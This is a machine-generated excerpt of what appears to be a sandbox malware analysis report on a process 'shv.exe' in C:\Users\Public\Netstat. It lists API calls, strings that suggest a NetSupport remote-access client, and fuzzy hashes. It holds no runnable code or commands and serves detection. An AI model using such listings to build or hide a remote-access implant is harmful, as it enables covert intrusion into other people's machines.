                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                        • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                        • API String ID: 806825551-1858614750
                                                                                        • Opcode ID: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                        • Instruction ID: bd5304e3d9974d7ab46afc427c644d654ac0d4b62daaa3d8a48381b774377c4d
                                                                                        • Opcode Fuzzy Hash: 10a04c85090393e181044af2bbe891b78f34dcae4f388202a219c12921f261b8
                                                                                        • Instruction Fuzzy Hash: 4B214676A142491BD701CF309D80BBFFFBA9F8B249F080578D852DB145E626D914C391
                                                                                        APIs
                                                                                          • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                          • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Netstat\shv.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144255
                                                                                        • ResetEvent.KERNEL32(00000258), ref: 11144269
                                                                                        • SetEvent.KERNEL32(00000258), ref: 1114427F
                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 1114428E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                        • String ID: MiniDump
                                                                                        • API String ID: 1494854734-2840755058
                                                                                        • Opcode ID: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                        • Instruction ID: 829689d5ebdc208bf7b78735a50f5ce9a06f611da5f38dced1c13c8e9b13f18e
                                                                                        • Opcode Fuzzy Hash: af02bfec1e2ad683ef615fadee7153e651b028109eb63fc5543e4d95a1405a56
                                                                                        • Instruction Fuzzy Hash: 4F113875E5422677E300DFF99C81F9AF768AB44B28F200230EA24D75C4EB71A504C7B1
                                                                                        APIs
                                                                                          • Part of subcall function 6D1C5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6D1C5014
                                                                                          • Part of subcall function 6D1C5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6D1C8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6D1C5034
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6D1C8EAE
                                                                                        • FreeLibrary.KERNEL32(?), ref: 6D1C8EBF
                                                                                          • Part of subcall function 6D1C2420: _strrchr.LIBCMT ref: 6D1C242E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3996192540.000000006D1C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D1C0000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3996174063.000000006D1C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996243537.000000006D209000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996265641.000000006D20E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3996304118.000000006D210000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_6d1c0000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
                                                                                        • String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
                                                                                        • API String ID: 3215810784-3459472706
                                                                                        • Opcode ID: 65341f4b3f156b25bc9408cc5ddadc7f3656625d3510c5c162b985704b3e22ea
                                                                                        • Instruction ID: 84b6d0ff3948fc53be61ec4b2f45d394d3170a049ca4cdbd80045f42dd60b00d
                                                                                        • Opcode Fuzzy Hash: 65341f4b3f156b25bc9408cc5ddadc7f3656625d3510c5c162b985704b3e22ea
                                                                                        • Instruction Fuzzy Hash: E4112671A441199BEB148B50DC85BFF7378AB2630AF014059EF08E3144EBB89944CB63
                                                                                        APIs
                                                                                        • _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                          • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                          • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                        • wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        • _memset.LIBCMT ref: 1110F477
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                        • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                        • API String ID: 3234921582-2664294811
                                                                                        • Opcode ID: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                        • Instruction ID: e8e28b36a5a63397ef775e95fa380a20e388029766e4784519104262db02a7f0
                                                                                        • Opcode Fuzzy Hash: 483ab18efc666d7fafa6765eedd91fa0800c96548fafe518ebc1f691375ec46a
                                                                                        • Instruction Fuzzy Hash: 1CF0F6B5E0012863C720AFA5AC06FEFF37C9F91658F440169EE04A7241EA71BA11C7E9
                                                                                        APIs
                                                                                          • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,76938400), ref: 111450D0
                                                                                          • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                          • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                          • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                        • LoadLibraryA.KERNEL32(shcore.dll,00000000,?,11030690,00000002), ref: 11145AFF
                                                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDpiAwareness), ref: 11145B11
                                                                                        • FreeLibrary.KERNEL32(00000000,?,11030690,00000002), ref: 11145B24
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Library$AddressFreeLoadOpenProcVersion_memset_strncpy
                                                                                        • String ID: SetProcessDpiAwareness$shcore.dll
                                                                                        • API String ID: 1108920153-1959555903
                                                                                        • Opcode ID: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                        • Instruction ID: 699a5c6b52ff0bb6954823876d42b720b76b3255f49526743c1f98bd9e848574
                                                                                        • Opcode Fuzzy Hash: 84c8b7a82ef375d59f410a45cba939869921b52f6e49d691c42b1d567085cd2e
                                                                                        • Instruction Fuzzy Hash: 67F0A03A70022877E21416BAAC08F9ABB5A8BC8A75F140230F928D69C0EB51C90086B5
                                                                                        APIs
                                                                                        • wsprintfA.USER32 ref: 11031926
                                                                                          • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                          • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                          • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                          • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                        • String ID: %s%s.bin$301389$clientinv.cpp$m_pDoInv == NULL
                                                                                        • API String ID: 4180936305-2736919879
                                                                                        • Opcode ID: 8c665bd7958abb01fa41c0eb9161827032ab5ea6725ba00c80f89516228d9cff
                                                                                        • Instruction ID: 64da4217f7417b153db366359b1c36bd372b32cb55e7c28d29c46c6ec3487e21
                                                                                        • Opcode Fuzzy Hash: 8c665bd7958abb01fa41c0eb9161827032ab5ea6725ba00c80f89516228d9cff
                                                                                        • Instruction Fuzzy Hash: 5421A1B9E04709AFD710CF65DC81BAAB7F4FB88718F40453EE86597680EB35A9008B65
                                                                                        APIs
                                                                                          • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                          • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                          • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                        • wsprintfA.USER32 ref: 1114593E
                                                                                        • wsprintfA.USER32 ref: 11145954
                                                                                          • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,76938400,?), ref: 111432C7
                                                                                          • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                          • Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CreateFolderPathwsprintf$CloseHandleModuleName
                                                                                        • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                                        • API String ID: 3779116287-2600120591
                                                                                        • Opcode ID: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                        • Instruction ID: 1f9a4f0ce9ce2038842d239495dc50e58c380b2d1dc072d0c6c391bd72002940
                                                                                        • Opcode Fuzzy Hash: 67484a9d389779804940ba9c5ec62be4ee321b08fc9342a56252b28d4b9918b0
                                                                                        • Instruction Fuzzy Hash: 9C01B1B990521D66CB109BB0AC41FEAF77C9B1470DF100199EC1996940EE21BA548BA4
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,76938400,?), ref: 111432C7
                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile$CloseHandle
                                                                                        • String ID: "
                                                                                        • API String ID: 1443461169-123907689
                                                                                        • Opcode ID: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                        • Instruction ID: 150de81b6b92e27c68bcdd2e608667d56283c35638c5ea37a79585d4ca6bceb2
                                                                                        • Opcode Fuzzy Hash: 6335c3239e743a75aad2b4d26ce3924e96bfc614049b49f4e6d7105e566d10f2
                                                                                        • Instruction Fuzzy Hash: 38217C30A1C269AFE3128E78DD54FD9BBA49F45B14F3041E0E4999B1C1DBB1A948C750
                                                                                        APIs
                                                                                          • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,461C6054,76232EE0,?,00000000,1118083B,000000FF,?,110300D6,UseIPC,00000001,00000000), ref: 1102D187
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                          • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7736C3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D14A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                                        • String ID: Client$DisableGeolocation
                                                                                        • API String ID: 3315423714-4166767992
                                                                                        • Opcode ID: 200e130d4cc0a5b84aba688065c8367ce8263274e01f9c4d602d3ddf573fc3e1
                                                                                        • Instruction ID: 1755caac6fc2658334c1ed2ebc8622a08952aff54e10c128aab6c20125b970ec
                                                                                        • Opcode Fuzzy Hash: 200e130d4cc0a5b84aba688065c8367ce8263274e01f9c4d602d3ddf573fc3e1
                                                                                        • Instruction Fuzzy Hash: 8521E474A40315BBE712CFA8CD42B6EF7A4E708B18F500269F921AB3C0D7B5B8008785
                                                                                        APIs
                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110271DA
                                                                                          • Part of subcall function 110CD550: EnterCriticalSection.KERNEL32(00000000,00000000,76933760,00000000,7694A1D0,1105DCBB,?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD56B
                                                                                          • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD598
                                                                                          • Part of subcall function 110CD550: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD5AA
                                                                                          • Part of subcall function 110CD550: LeaveCriticalSection.KERNEL32(?,?,?,?,11026543,00000000,?,?,00000000), ref: 110CD5B4
                                                                                        • TranslateMessage.USER32(?), ref: 110271F0
                                                                                        • DispatchMessageA.USER32(?), ref: 110271F6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.3995717435.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000006.00000002.3995697188.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995894249.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.3995911511.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                        • String ID: Exit Msgloop, quit=%d
                                                                                        • API String ID: 3212272093-2210386016
                                                                                        • Opcode ID: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                        • Instruction ID: 083e85bce0718499e1b375aadfda5de5654481b636091be3423b85693ac47093
                                                                                        • Opcode Fuzzy Hash: 4c35fe21e6f1fdccfd242282fb0e51879004b37df93db9ac228ac0a7d4dc8e25
                                                                                        • Instruction Fuzzy Hash: 3D01D876E0521D66EB15DAE99C82F6FF3BD6B64718FD00065EE1092185F760F404CBA1
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 110173FD
                                                                                          • Part of subcall function 11017300: WaitForSingleObject.KERNEL32(00000328,000000FF), ref: 1101733C
                                                                                          • Part of subcall function 11017300: CoInitialize.OLE32(00000000), ref: 11017345
                                                                                          • Part of subcall function 11017300: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                          • Part of subcall function 11017300: CoUninitialize.COMBASE ref: 110173D0
                                                                                          • Part of subcall function 11017220: WaitForSingleObject.KERNEL32(00000328,000000FF), ref: 11017252
                                                                                          • Part of subcall function 11017220: CoInitialize.OLE32(00000000), ref: 1101725B
